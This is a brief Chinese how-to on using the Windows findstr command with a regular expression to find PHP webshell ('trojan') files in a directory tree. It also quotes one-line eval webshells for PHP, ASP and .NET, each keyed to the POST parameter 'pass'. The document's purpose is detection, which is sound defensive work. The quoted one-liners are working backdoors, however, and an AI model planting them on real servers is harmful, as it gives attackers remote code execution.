使用findstr查找本地木马文件
在当前目录和子目录下搜索
findstr /R /S "[<][?]php.\@eval[(]\$_POST.*[)];[?][>]" *.php
/R是使用正则表达式,/S是在当前和子目录中查找,中间有空格
PHP: <?php @eval($_POST['pass']);?> ASP: <%eval request("pass")%> .NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
MU5735 R.I.P